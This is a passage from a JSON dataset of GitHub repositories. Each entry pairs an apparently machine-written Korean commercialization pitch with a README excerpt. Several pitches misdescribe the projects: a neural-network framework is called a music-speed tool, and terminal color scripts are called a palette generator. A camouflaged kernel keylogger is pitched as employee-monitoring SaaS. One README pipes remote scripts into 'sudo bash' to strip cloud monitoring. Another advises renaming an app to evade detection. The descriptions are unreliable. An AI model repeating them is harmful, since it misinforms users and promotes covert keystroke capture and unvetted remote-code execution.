reject it and will just move out of their reach all our companies and domains__. This will soon be reflected in the codebase.\n \n---------------\n\nThis is the Universa network codebase (Java core), containing the node, the console client (`uniclient`) and the associated subsystems.\n\nThe latest documentation on Universa is available in Universa Knowledge Base at [kb.universablockchain.com](https://kb.universablockchain.com). For a visual guide on the documentation topics, visit the Universa Development Map at [lnd.im/UniversaDevelopmentMap](https://lnd.im/UniversaDevelopmentMap).\n\n\n## Docker image\n\nIf you are looking for the information ","composite_score":0.3037,"license_safety_tag":"unknown"},{"name":"deFiss/telegram_channel_duplicator","github_url":"https://github.com/deFiss/telegram_channel_duplicator","stars":99,"language":"Python","license":"unknown","abandonment_months":36,"description":"# deFiss/telegram_channel_duplicator 상업화 분석\n\n이 저장소는 Telegram 채널 콘텐츠 자동화 도구로, 99개의 Star를 받아 일정한 관심도를 보유하고 있습니다. **상업화 가능성**은 마케팅 에이전시나 소셜 미디어 관리 서비스 업체에서 다중 채널 콘텐츠 배포 솔루션으로 활용할 수 있다는 점에서 중간 수준입니다. Vian","readme_excerpt":"","composite_score":0.3036,"license_safety_tag":"unknown"},{"name":"bonfy/go-mega","github_url":"https://github.com/bonfy/go-mega","stars":22,"language":"Go","license":"NOASSERTION","abandonment_months":72,"description":"# go-mega 프로젝트 분석\n\n## 왜 보물인가\n클라우드 저장소(메가)를 프로그래밍 방식으로 자동 관리할 수 있게 해주는 도구로, 반복적인 파일 업로드/다운로드 작업을 효율화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객이 메가 계정을 자동으로 백업·동기화하는 웹 서비스\n- **내부 업무 도구**: 회사의 대량 파일을 메가","readme_excerpt":"![cover](cover.png)\n\n# Go-Mega\n\n[![License: CC BY-NC-ND 4.0](https://img.shields.io/badge/License-CC%20BY--NC--ND%204.0-brightgreen.svg)](https://raw.githubusercontent.com/bonfy/go-mega/master/LICENSE)\n\n大家好，我是 [BONFY](https://github.com/bonfy) ，拥有多年开发Web的经验，不过想起我当时入门 Python Web 的时候也是看了当时 [Miguel Grinberg](https://blog.miguelgrinberg.com/) 的博客，按照他的教程一步一步搭建最简单的博客，再到自己去研究 **Flask** 源码以及其他的 Web 框架。\n\n目前由于工作需要，我经常要用 **Go** 开发Web应用，也积攒了一些经验和方法，所以就想模仿 [The Flask Mega-Tutorial教程](https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world) 来编写一套 **Go** 的 Web 教程。\n\n本书的目录我尽量和 The Flask Mega 保持一致，不过对于有些章节也会酌情删减。\n\n## 章节总览\n\n| Title | Source Code | Zip |\n| :--- | :--- | :--- |\n| [00-Prepare](00-prepare.md) |  | |\n| [01-Hello-World](01-hello-world.md) | [View](https://github.com/bonfy/go-mega-code/tree/01-Hello-World) | [Download](https://github.com/bonfy/go-mega-code/archive/v0.1.zip)|\n| [02-Template-Basic](02-template-basic.md) | [View](https://github.com/bonfy/go-mega-code/tree/0","composite_score":0.3036,"license_safety_tag":"unknown"},{"name":"fossasia/fossasia-communities","github_url":"https://github.com/fossasia/fossasia-communities","stars":11,"language":"","license":"unknown","abandonment_months":124,"description":"# fossasia/fossasia-communities 평가\n\n## 왜 보물인가\n전 세계 오픈소스 커뮤니티들을 한곳에서 연결하고 관리할 수 있는 플랫폼으로, 분산된 개발자 커뮤니티를 효율적으로 조직화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기술 커뮤니티 관리 플랫폼으로 월 구독형 서비스 제공\n2. **내부 업무 도구**: 대규모 ","readme_excerpt":"fossasia-communities\n====================\n\nFOSSASIA API Files of Communities in Asia\n\nAbout FOSSASIA.net\n====\n\nThe FOSSASIA.net project is an initiative to bring the Asian Free and Open Source Software and OpenTech community together and foster cooperation. We make it easy to find communities and projects on a map with links to the websites, social media channels, and automatically updated info from community blogs. The use of the FOSSASIA-API enables us to collect the data of communities in a decentralized way. This is important to us, as it keeps communities in control. They do not depend on our infrastructure and could potentially setup their own service.\n\nStep by Step\n=====\n\nStep by Step from API Generator to the your community listing on FOSSASIA.net.\n\n1. Go to http://api.fossasia.net/generator/index.html and fill in the information about your community in the form and press \"OK - generate...\". Mandatory fields are marked with an asterisk. The more information you enter, the bette","composite_score":0.3036,"license_safety_tag":"unknown"},{"name":"MeowLove/AlibabaCloud-CentOS7-Pure-and-safe","github_url":"https://github.com/MeowLove/AlibabaCloud-CentOS7-Pure-and-safe","stars":5,"language":"Shell","license":"unknown","abandonment_months":97,"description":"# MeowLove/AlibabaCloud-CentOS7-Pure-and-safe 분석\n\n## 왜 보물인가\n알리바바 클라우드 환경에서 안전하고 깨끗한 서버 환경을 자동으로 구성해주는 설정 모음으로, 서버 보안에 신경 쓰는 기업들에게 즉시 활용 가능한 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 알리바바 클라우드 기반 웹서비","readme_excerpt":"# AlibabaCloud-CentOS7-Pure-and-safe\nOptimize and purify your Alibaba Cloud ECS instances.\nMy website: https://www.cxthhhhh.com\n\n\nFeatures:\n1. Remove Alibaba Cloud monitoring programs and block bad IPs with firewall to protect your privacy. Switch to other yum repositories. The Alibaba Cloud mirror lacks up-to-date packages and using those old packages may result in a security breach.\n\n    (For Alibaba Cloud CentOS 7 +, not tested on other OSes.)\n\n2. Optimize your network connection by installing LotServer and create a swap of 2 GB.\n\n    (For all CentOS 7 systems, tested on Alibaba, Vultr, Azure, etc.) (Swap Location: /var/swapx)\n\n\nBrand new installation\n\n    sudo curl -sSL https://raw.githubusercontent.com/MeowLove/AlibabaCloud-CentOS7-Pure-and-safe/master/download/kill/New_installation.sh | sudo bash\n\nSnapshot / mirror recovery\n\n    sudo curl -sSL https://raw.githubusercontent.com/MeowLove/AlibabaCloud-CentOS7-Pure-and-safe/master/download/kill/Snapshot_image.sh | sudo bash\n\nReplace ","composite_score":0.3036,"license_safety_tag":"unknown"},{"name":"yale8848/RetrofitCache","github_url":"https://github.com/yale8848/RetrofitCache","stars":5,"language":"Java","license":"mit","abandonment_months":83,"description":"# RetrofitCache 평가 보고서\n\n## 왜 보물인가\n앱이 인터넷 없이도 이전에 불러온 정보를 바로 보여줄 수 있게 만드는 기술로, 사용자 경험을 크게 개선합니다.\n\n## 어디에 쓸 수 있나\n- **뉴스·쇼핑 앱**: 한 번 읽은 기사나 상품 정보를 오프라인에서도 즉시 표시\n- **금융 앱**: 계좌 잔액, 거래 내역을 캐시하여 느린 네트워크에서도 ","readme_excerpt":"# RetrofitCache\n\n[English](README_EN.md)\n\n[![](https://img.shields.io/badge/jcenter-retrofitcache_1.1.1-519dd9.svg)](https://bintray.com/yale8848/maven/retrofitcache/1.1.1)\n[![](https://img.shields.io/badge/jcenter-retrofitcacherx2_1.1.1-519dd9.svg)](https://bintray.com/yale8848/maven/retrofitcacherx2/1.1.1)\n\nRetrofitCache让retrofit2+okhttp3+rxjava 配置缓存如此简单。通过注解配置，可以针对每一个接口灵活配置缓存策略；同时让每一个接口方便支持数据模拟，可以代码减小侵入性，模拟数据可以从内存，Assets，url轻松获取。\n\n## 为什么使用RetrofitCache\n\n- 服务端接口不严格按照http缓存策略配置，有些不会针对每一个请求单独配置缓存策略\n- 第三方缓存库不是很方便的针对每一个接口进行缓存策略配置，侵入性比较大\n- 很方便的针对每个接口添加模拟数据\n\n## 调用例子\n\n- 不走缓存例子\n\n```\n@GET(\"users\")\nObservable<HttpResult> test();\n```\n\n- 缓存设置为20秒\n\n ```\n@Cache(time = 20)\n@GET(\"users\")\nObservable<HttpResult> test();\n ```\n\n- 缓存设置为20分钟\n\n ```\n@Cache(time = 20,timeUnit = TimeUnit.MINUTES)\n@GET(\"users\")\nObservable<HttpResult> test();\n ```\n\n- 默认时间缓存,默认是0秒\n\n ```\n@Cache()\n@GET(\"users\")\nObservable<HttpResult> test();\n ```\n\n- 默认在无网的时候强制走缓存，forceCacheNoNet=false时无网络时不强制缓存\n\n ```\n@Cache(forceCacheNoNet = false","composite_score":0.3035,"license_safety_tag":"safe"},{"name":"openwisp/django-freeradius","github_url":"https://github.com/openwisp/django-freeradius","stars":9,"language":"Python","license":"gpl-3.0","abandonment_months":69,"description":"# django-freeradius 평가 보고서\n\n## 왜 보물인가\nWiFi나 인터넷 접근 권한을 관리하는 핵심 기술을 간편하게 구축할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **WiFi 호텔/카페 SaaS**: 손님들의 WiFi 접속을 자동으로 관리하고 요금을 청구하는 서비스\n2. **기업 내부 접근 관리 도구**: 회사 직원들의 네트워크","readme_excerpt":"django-freeradius\n=================\n\n**WARNING**: The development of this project has moved to `openwisp-radius <https://github.com/openwisp/openwisp-radius>`_, we advise all users of *django-freeradius* to follow the tutorial below to migrate their existing database:\n\n1. Take a backup of your database.\n2. Create JSON backup of data that's required for migration with the following command:\n\n.. code-block:: shell\n\n    # Go to the django-freeradius repository (or installed app)\n    cd tests/\n    python manage.py dumpdata auth.user > user.json\n    python manage.py dumpdata auth.group > group.json\n    python manage.py dumpdata auth.permission > permission.json\n    python manage.py dumpdata contenttypes > contenttype.json\n    python manage.py dumpdata sites > site.json\n    python manage.py dumpdata socialaccount > social.json\n    python manage.py dumpdata django_freeradius > freeradius.json\n    pwd # copy output of the command\n\n3. `Setup openwisp-radius <https://openwisp-radius.readthedocs.","composite_score":0.3035,"license_safety_tag":"restricted"},{"name":"stark/Color-Scripts","github_url":"https://github.com/stark/Color-Scripts","stars":19,"language":"Shell","license":"unknown","abandonment_months":55,"description":"# Color-Scripts 상용화 분석\n\n## 왜 보물인가\n프로그램이나 웹사이트에서 색상을 자동으로 만들고 관리해주는 도구로, 디자인 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 브랜드 색상 팔레트를 자동 생성하고 관리하는 클라우드 기반 도구\n2. **내부 업무 도구**: 디자인팀이 색상 규칙을 ","readme_excerpt":"# Color-Scripts\n\nColor scripts created by various people that was scattered around the web now in one place.\n\nYou will find screenshots in the directory named `preview`\n\nAll the scripts have been baptized with `chmod +x`\n\n![Screenshot](http://i.imgur.com/tyA72c7.png)\n\n## Dependencies\n\n- `bash`\n- `python 2 or 3` (required for `print-colors.py` and `unowns.py`)\n- `perl` (required for `color-support1.pl`)\n\n## Download\n\n### Using Git\n\nClone this repository:\n```sh\ngit clone https://github.com/stark/color-scripts\n```\n\n### Without Git\n\n[Download tarball](https://git.io/colr.tar.gz)\n```\nwget git.io/colr.tar.gz\n```\n\n[Download zipball](https://git.io/colr.zip)\n```\nwget git.io/colr.zip\n```\n\n## Contributions\n\nIf you have created or found a color script which is not present in this repository then **Feel Free** to make a [Pull Request](https://github.com/stark/Color-Scripts/pulls) :-)\n\nYou can also share your script via a pastebin of your choice and pasting the link in a [New Issue](https://github.","composite_score":0.3035,"license_safety_tag":"unknown"},{"name":"lefticus/cppbestpractices","github_url":"https://github.com/lefticus/cppbestpractices","stars":5,"language":"","license":"NOASSERTION","abandonment_months":22,"description":"# lefticus/cppbestpractices 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 안전하고 효율적인 코드를 작성하는 방법을 배울 수 있는 실무 가이드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 교육 플랫폼**: 프로그래밍 학원이나 온라인 코딩 교육 서비스에서 커리큘럼 자료로 활용\n2. **기업 내부 개발 표준**: 소프트웨어 회사","readme_excerpt":"# cppbestpractices\n\n[![Join the chat at https://gitter.im/lefticus/cppbestpractices](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/lefticus/cppbestpractices?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nCollaborative Collection of C++ Best Practices\n\nFor more information please see the [Preface](01-Preface.md).\n\nThis online resource is part of Jason Turner's collection of C++ Best Practices resources.\n\n* [C++ Best Practices Book](https://leanpub.com/cppbestpractices)\n* [C++ Weekly YouTube Channel](https://www.youtube.com/user/lefticus1)\n* [The Ultimate CMake/C++ Starter Project](https://github.com/lefticus/cpp_starter_project/)\n* [Learning C++ Best Practices - O'Reilly Video](http://shop.oreilly.com/product/0636920049814.do)\n","composite_score":0.3035,"license_safety_tag":"unknown"},{"name":"in66-dev/In-Prestissimo","github_url":"https://github.com/in66-dev/In-Prestissimo","stars":27,"language":"C++","license":"NOASSERTION","abandonment_months":102,"description":"# In-Prestissimo 분석 보고서\n\n## 왜 보물인가\n음악 재생 속도를 자유롭게 조절할 수 있는 기술로, 언어 학습이나 음악 연습 같은 다양한 분야에서 실용적으로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **언어 학습 플랫폼**: 영어 발음 학습자가 원어민 속도를 늦춰서 명확하게 들으며 공부하는 SaaS 서비스\n2. **음악 교육 소프","readme_excerpt":"# 绝影\n\n---\n\n绝影（英文名Prestissimo）是一个应用于移动端的轻量级高性能神经网络前向计算框架。ios, android 上的速度均快于目前的开源框架（ncnn、mdl 等等）。\n\n---\n\n## 功能概述\n\n### 基础功能\n* 支持卷积神经网络，支持多输入和多分支结构\n* 精炼简洁的API设计，使用方便\n* 提供调试接口，支持打印各个层的数据以及耗时\n* 不依赖任何第三方计算框架，整体库体积 500K 左右（32位 约400k，64位 约600k）\n* 纯 C++ 实现，跨平台，支持 android 和 ios\n* 模型为纯二进制文件，不暴露开发者设计的网络结构\n\n### 极快的速度\n* 大到框架设计，小到汇编书写上全方位的优化，iphone7 上跑 SqueezeNet 仅需 26ms（单线程）\n* 支持浮点(float)和整型(int)两种运算模式，float模式精度与caffe相同，int模式运算速度快，大部分网络用int的精度便已经足够\n* 以巧妙的内存布局提升cpu的cache命中率，在中低端机型上性能依然强劲\n* 针对 float-arm32, float-arm64, int-arm32, int-arm64 四个分支均做了细致的优化，保证arm32位和arm64位版本都有非常好的性能\n\n\n\n#### SqueezeNet-v1.1 测试结果\n**Note**: 手机测试性能存在一定的抖动，连续多次运算取平均时间\n\n**Note**: 像华为mate8, mate9，Google nexus 6 虽然是64位的CPU，但测试用的是 32位的库，因此cpu架构依然写 arm-v7a\n\n|CPU架构|机型|CPU|ncnn（4线程）|mdl|Prestissimo_float(单线程)|Prestissimo_int(单线程)|\n|:---:|:----:|:----:|:----:|:----:|:----:|:----:|\n|arm-v7a|小米2|高通APQ8064 1.5GHz | 185 ms| 370 ms|184 ms| 115 ms|\n|arm-v7a|小米2s| 四核 骁龙APQ8064 Pro 1.7GHz | 166 ms| - | 136 ms |96 ms |\n|arm-v7a|红米Note 4x|骁龙625 ","composite_score":0.3035,"license_safety_tag":"unknown"},{"name":"jarun/keysniffer","github_url":"https://github.com/jarun/keysniffer","stars":6,"language":"C","license":"gpl-2.0","abandonment_months":50,"description":"# keysniffer 저장소 분석\n\n## 왜 보물인가\n컴퓨터 키보드 입력을 감지하는 기술로, 보안 감시나 사용자 행동 분석이 필요한 조직에서 핵심 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **기업 보안 모니터링 SaaS**: 직원 컴퓨터의 키보드 활동을 추적하여 데이터 유출 방지\n- **내부 감시 솔루션**: 회사 PC 사용 현황 분석 및 ","readme_excerpt":"# spy\nA Linux kernel module to grab keys pressed in the keyboard, or a keylogger.\n\nIt's also an academic project for devs willing to learn Linux kernel module programming, with extensive comments, checkpatch.pl scanned code, standards-compliant Makefile and DKMS support.\n\nspy was initially written for the US keyboard (and conforming laptops). By default it shows human-readable strings for the keys pressed. Optionally, the `keycode shift_mask` pair can be printed in hex or decimal. You can lookup the keycodes in `/usr/include/linux/input-event-codes.h`.\n\nThe keypress logs are recorded in debugfs as long as the module is loaded. Only root or sudoers can read the log. The module name has been camouflaged to blend-in with other kernel modules.\n\nYou can, however, execute a script at shutdown or reboot (the procedure would be distro-specific) to save the keys to a file.\n\n**DISCLAIMER:** spy is intended to track your own devices and NOT to trespass on others. The author is not responsible for","composite_score":0.3034,"license_safety_tag":"restricted"},{"name":"LeetCode-OpenSource/rxjs-hooks","github_url":"https://github.com/LeetCode-OpenSource/rxjs-hooks","stars":5,"language":"TypeScript","license":"unknown","abandonment_months":38,"description":"# rxjs-hooks 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 실시간 데이터 흐름을 효율적으로 관리하는 도구로, 복잡한 데이터 처리를 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 협업 도구 SaaS**: 여러 사용자가 동시에 문서를 편집할 때 실시간 동기화 기능 제공\n2. **대시보드 내부 업무 도구**: 주식 시세, 센서","readme_excerpt":"# React hooks for RxJS\n[![CircleCI](https://circleci.com/gh/LeetCode-OpenSource/rxjs-hooks.svg?style=svg)](https://circleci.com/gh/LeetCode-OpenSource/rxjs-hooks)\n[![codecov](https://codecov.io/gh/LeetCode-OpenSource/rxjs-hooks/branch/master/graph/badge.svg)](https://codecov.io/gh/LeetCode-OpenSource/rxjs-hooks)\n[![npm version](https://badge.fury.io/js/rxjs-hooks.svg)](https://badge.fury.io/js/rxjs-hooks)\n\n- [Installation](#installation)\n- [Demo](#quick-look)\n- [Apis](#apis)\n  1. [useObservable](#useobservable)\n  2. [useEventCallback](#useeventcallback)\n\n## Installation\n\nUsing npm:\n\n```\n$ npm i --save rxjs-hooks rxjs\n```\n\nOr yarn:\n\n```\n$ yarn add rxjs-hooks rxjs\n```\n\n## Quick look\n\n- [useObservable - live demo](https://codesandbox.io/s/rxjs-hooks-basic-oee81n)\n\n```javascript\nimport React from \"react\";\nimport ReactDOM from \"react-dom/client\";\nimport { useObservable } from \"rxjs-hooks\";\nimport { interval } from \"rxjs\";\nimport { map } from \"rxjs/operators\";\n\nfunction App() {\n  const value","composite_score":0.3034,"license_safety_tag":"unknown"},{"name":"geekape/applet-h5-shop","github_url":"https://github.com/geekape/applet-h5-shop","stars":29,"language":"JavaScript","license":"NOASSERTION","abandonment_months":88,"description":"# geekape/applet-h5-shop 평가 보고서\n\n## 왜 보물인가\n스마트폰 화면에서 바로 쇼핑할 수 있는 작은 앱을 만드는 기술로, 쇼핑몰을 운영하는 사람들이 앱 개발 없이도 빠르게 모바일 판매 채널을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 온라인 쇼핑몰 운영자를 위한 월 구독형 \"모바일 쇼핑 앱 ","readme_excerpt":"安装教程及二次开发文档：https://www.weiphp.cn/doc.html\n\n问题反馈及建议：https://bug.weiphp.cn/index.php?s=/w10/Bug/Wap/invite/project_id/88\n问题反馈及建议：https://bug.weiphp.cn/index.php?s=/w10/Bug/Wap/invite/project_id/88\n\n## 前言\n\n一个集**微信公众号商城**/**小程序商城**/**商城后台**的一个开源项目，后台是基于`WeiPHP5.0`开发的，`WeiPHP`是一个简洁而强大的开源微信公众平台开发框架，微信功能插件化开发,多公众号管理,配置简单。\n\n这里主要介绍下**前端方面**（实在是后端的不太懂～），没图没真相，上图（图片有点大），文章结尾有`源码地址`和`公众号商城体验地址`：\n\n![前端页面思维导图](https://user-gold-cdn.xitu.io/2018/11/30/16761e6c27ba41d5?w=1417&h=861&f=png&s=153482)\n\n![前端页面部分UI图](https://user-gold-cdn.xitu.io/2018/11/30/1676342f099eba7e?w=5000&h=3000&f=jpeg&s=704611)\n\n![商城后台部分界面](https://user-gold-cdn.xitu.io/2018/11/30/16764ba36f8437cc?w=1425&h=662&f=png&s=408701)\n## 1. 目录结构\n\n开源项目第一层的目录结构：\n```\n├── LICENSE.txt\n├── README.md\n├── application\n├── build.php\n├── composer.json\n├── composer.lock\n├── config\n├── images\n├── mpvue // 小程序和公众号商城源码在这\n├── public\n├── route\n├── server.php\n├── think\n├── thinkphp\n├── vendor\n└── weiapp_demo\n```\n\n以下是**商城前端页面**的三层的目录结构：\n``` js\n├── wap // 公众","composite_score":0.3034,"license_safety_tag":"unknown"},{"name":"bvaughn/progress-estimator","github_url":"https://github.com/bvaughn/progress-estimator","stars":67,"language":"JavaScript","license":"unknown","abandonment_months":38,"description":"# progress-estimator 상용화 분석\n\n## 왜 보물인가\n작업이 언제 끝날지 정확하게 예측해주는 도구로, 프로젝트 일정 관리에 곤란을 겪는 모든 조직에 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 프로젝트 관리 SaaS 서비스**\n기존 협업 도구(예: 아사나, 먼데이닷컴)에 진행 상황 예측 기능을 추가하여 팀의 마감일 관리를 자동화합니다","readme_excerpt":"# progress-estimator\n\nLogs a progress bar and estimation for how long a Promise will take to complete. This library tracks previous durations in order to provide more accurate estimates over time.\n\n![Demo](https://user-images.githubusercontent.com/29597/48986949-474e2400-f0cf-11e8-86d7-d201f8ad8eca.gif)\n\n### 🎉 [Become a sponsor](https://github.com/sponsors/bvaughn/) or ☕ [Buy me a coffee](http://givebrian.coffee/)\n\n## Installation\n\n```shell\n# use npm\nnpm install progress-estimator\n\n# use yarn\nyarn add progress-estimator\n```\n\n## Usage example\n\n```js\nconst createLogger = require('progress-estimator');\nconst { join } = require('path');\n\n// All configuration keys are optional, but it's recommended to specify a storage location.\n// Learn more about configuration options below.\nconst logger = createLogger({\n  storagePath: join(__dirname, '.progress-estimator'),\n});\n\nasync function run() {\n  await logger(promiseOne, \"This is a promise\");\n  await logger(\n    promiseTwo,\n    \"This is another pr","composite_score":0.3033,"license_safety_tag":"unknown"},{"name":"vuejs/vue-loader","github_url":"https://github.com/vuejs/vue-loader","stars":5,"language":"TypeScript","license":"mit","abandonment_months":22,"description":"# Vue Loader 상용화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 Vue.js라는 도구의 핵심 부품으로, 전 세계 수많은 개발자들이 의존하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 기반 SaaS 플랫폼**: Vue Loader를 기반으로 한 클라우드 협업 도구(프로젝트 관리, 문서 공유 등) 제공\n2. **내부 업무 ","readme_excerpt":"# vue-loader [![ci](https://github.com/vuejs/vue-loader/actions/workflows/ci.yml/badge.svg?branch=main)](https://github.com/vuejs/vue-loader/actions/workflows/ci.yml)\n\n> webpack loader for Vue Single-File Components\n\n- [Documentation](https://vue-loader.vuejs.org)\n\n## v17.2.1+ Only Options\n\n- `experimentalInlineMatchResource: boolean`: enable [Inline matchResource](https://webpack.js.org/api/loaders/#inline-matchresource) for rule matching for vue-loader.\n\n## v16+ Only Options\n\n- `reactivityTransform: boolean`: enable [Vue Reactivity Transform](https://github.com/vuejs/rfcs/discussions/369) (SFCs only).\n\n- ~~`refSugar: boolean`: **removed.** use `reactivityTransform` instead.~~\n\n- `customElement: boolean | RegExp`: enable custom elements mode. An SFC loaded in custom elements mode inlines its `<style>` tags as strings under the component's `styles` option. When used with `defineCustomElement` from Vue core, the styles will be injected into the custom element's shadow root.\n\n  - Default","composite_score":0.3033,"license_safety_tag":"safe"},{"name":"aserg-ufmg/JSCity","github_url":"https://github.com/aserg-ufmg/JSCity","stars":5,"language":"JavaScript","license":"gpl-2.0","abandonment_months":80,"description":"# JSCity 프로젝트 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 코드를 마치 도시 풍경처럼 시각화해서 한눈에 이해할 수 있게 만드는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 코드 분석 SaaS 서비스**\n개발자들이 프로젝트의 구조와 품질을 시각적으로 분석하는 웹 기반 서비스로 제공 가능합니다.\n\n**2. 기업 개발팀 내부 도구**\n대규모 소프트","readme_excerpt":"# JSCity\n   JSCity is an implementation of the Code City metaphor for visualizing source code. We adapted and implemented this metaphor for JavaScript, using the three.js 3D library.\n   JSCity represents a JavaScript program as a city; folders are districts and files are sub-districts; the buildings are functions; inner functions are represented as buildings on the top of their nested function/building.\n   The Number Of Lines of Source (LOC) represents the height of the buildings/functions; the Number Of Variables (NOV) in a function correlates to the building's base size. Blue buildings denote named functions; green buildings are anonymous functions.\n\n### Examples ###\n\nFor examples of cities check: [Wiki](https://github.com/ASERG-UFMG/JSCity/wiki/JSCITY).\n\n### About ###\n\nJSCity is an outcome of research conducted in the [Applied Software Engineering Research Group](http://aserg.labsoft.dcc.ufmg.br/), at Federal University of Minas Gerais, Brazil\n\n\n\n### Steps to see your first 3D Javas","composite_score":0.3033,"license_safety_tag":"restricted"},{"name":"shadowsocksRb/shadowsocksRb-android","github_url":"https://github.com/shadowsocksRb/shadowsocksRb-android","stars":7,"language":"Kotlin","license":"NOASSERTION","abandonment_months":59,"description":"# shadowsocksRb-android 프로젝트 분석\n\n## 왜 보물인가\n개인정보 보호를 원하는 일반 사용자들이 안전하게 인터넷을 사용할 수 있도록 돕는 안드로이드 앱입니다.\n\n## 어디에 쓸 수 있나\n- **프라이빗 VPN 서비스**: 개인정보 보호를 원하는 사용자를 위한 월간 구독형 앱 서비스\n- **기업 보안 솔루션**: 직원들의 안전한 네트워크 ","readme_excerpt":"## ShadowsocksR Android 客户端\n\n由 Shadowsocks Android 客户端修改而来，支持 SSR 协议。\n\n[常见问题](FAQ.md)\n\n### 编译\n\n* [Git](https://git-scm.com/downloads)\n* [OpenJDK 11+](https://jdk.java.net/)\n* [Android SDK](https://developer.android.com/studio#command-tools)\n  - Android SDK Build-Tools 31.0.0\n  - Android SDK Platform 31\n  - NDK (Side by side) 21.4.7075529\n  - Android SDK Tools\n\n```shell script\ngit clone --recurse-submodules https://github.com/shadowsocksRb/shadowsocksRb-android.git\ncd shadowsocksRb-android\n# 建议编辑 mobile/build.gradle ,修改 applicationId 以规避检测\n./gradlew aR\nadb install mobile/build/outputs/apk/release/mobile-release.apk\n```\n\n### 贡献\n\n欢迎问题修复，功能添加及翻译。其中问题修复和功能添加请优先考虑为上游贡献，翻译请以简体中文为底本。\n\n### 许可\n\nGPLv3\n\n使用的库\n\n<ul>\n    <li>redsocks: <a href=\"https://github.com/shadowsocks/redsocks/blob/shadowsocks-android/README\">APL 2.0</a></li>\n    <li>mbed TLS: <a href=\"https://github.com/ARMmbed/mbedtls/blob/development/LICENSE\">APL 2.0</a></li>\n    <li>libevent: <a href=\"https://github.com/shadowsocks/libevent","composite_score":0.3033,"license_safety_tag":"unknown"},{"name":"zendframework/zend-code","github_url":"https://github.com/zendframework/zend-code","stars":5,"language":"PHP","license":"bsd-3-clause","abandonment_months":77,"description":"# Zend Framework Code 분석 리포트\n\n## 왜 보물인가\n프로그래머들이 반복적으로 작성해야 하는 코드 생성 작업을 자동화해주는 도구로, 소프트웨어 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 코드 자동 생성 플랫폼**\n   개발자들이 웹에서 원하는 기능을 선택하면 자동으로 소스코드를 만들어주는","readme_excerpt":"# zend-code\n\n> ## Repository abandoned 2019-12-31\n>\n> This repository has moved to [laminas/laminas-code](https://github.com/laminas/laminas-code).\n\n[![Build Status](https://secure.travis-ci.org/zendframework/zend-code.svg?branch=master)](https://secure.travis-ci.org/zendframework/zend-code)\n[![Coverage Status](https://coveralls.io/repos/github/zendframework/zend-code/badge.svg?branch=master)](https://coveralls.io/github/zendframework/zend-code?branch=master)\n\n`Zend\\Code\\Generator` provides facilities to generate arbitrary code using an\nobject-oriented interface, both to create new code as well as to update existing\ncode. While the current implementation is limited to generating PHP code, you\ncan easily extend the base class in order to provide code generation for other\ntasks: JavaScript, configuration files, apache vhosts, etc.\n\n- File issues at https://github.com/zendframework/zend-code/issues\n- Documentation is at https://docs.zendframework.com/zend-code/\n- Migration documentation f","composite_score":0.3032,"license_safety_tag":"safe"},{"name":"secrary/Hooking-via-InstrumentationCallback","github_url":"https://github.com/secrary/Hooking-via-InstrumentationCallback","stars":6,"language":"C++","license":"unknown","abandonment_months":103,"description":"# secrary/Hooking-via-InstrumentationCallback 분석\n\n## 왜 보물인가\n프로그램의 실행 과정을 감시하고 제어할 수 있는 기술로, 보안 검사나 성능 모니터링이 필요한 기업들이 찾는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **악성 소프트웨어 탐지 솔루션**: 기업의 컴퓨터에서 위험한 프로그램의 숨겨진 행동을 실시간","readme_excerpt":"","composite_score":0.3032,"license_safety_tag":"unknown"},{"name":"jsdw/yap","github_url":"https://github.com/jsdw/yap","stars":8,"language":"Rust","license":"MIT","abandonment_months":15,"description":"# jsdw/yap 평가 보고서\n\n## 왜 보물인가\n야악(YAP)은 웹 개발자들이 반복적인 작업을 자동화할 수 있는 경량 도구로, 작은 프로젝트부터 빠르게 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 빌더 플랫폼에서 사용자가 코드 없이 자동화 기능을 설정하게 하는 기능\n- **내부 업무 도구**: 개발팀이 반복되는 ","readme_excerpt":"# Yap: Yet another (rust) parsing library\n\n[![API docs](https://docs.rs/yap/badge.svg)](https://docs.rs/yap)\n\nThis small, zero-dependency crate helps you to parse input strings and slices by building on the `Iterator`\ninterface.\n\nThe aim of this crate is to provide the sorts of functions you'd come to expect from a parser\ncombinator library, but without immersing you into a world of parser combinators and forcing you\nto use a novel return type, library-provided errors or parser-combinator based control flow. we\nsacrifice some conciseness in exchange for simplicity.\n\n**Some specific features/goals:**\n- Great documentation, with examples for almost every function provided.\n- Prioritise simplicity at the cost of verbosity.\n- Be iterator-centric. Where applicable, combinators return things which implement `Tokens`/`Iterator`.\n- Allow user defined errors to be returned anywhere that it might make sense. Some functions have `_err`\n  variants incase you need error information when they don't ","composite_score":0.3032,"license_safety_tag":"safe"},{"name":"fossasia/2012.fossasia.org","github_url":"https://github.com/fossasia/2012.fossasia.org","stars":10,"language":"CSS","license":"unknown","abandonment_months":72,"description":"# FOSSASIA 2012 컨퍼런스 웹사이트 분석\n\n## 왜 보물인가\n2012년 아시아 최대 오픈소스 컨퍼런스의 공식 웹사이트로, 당시 기술 커뮤니티 규모와 영향력을 추적할 수 있는 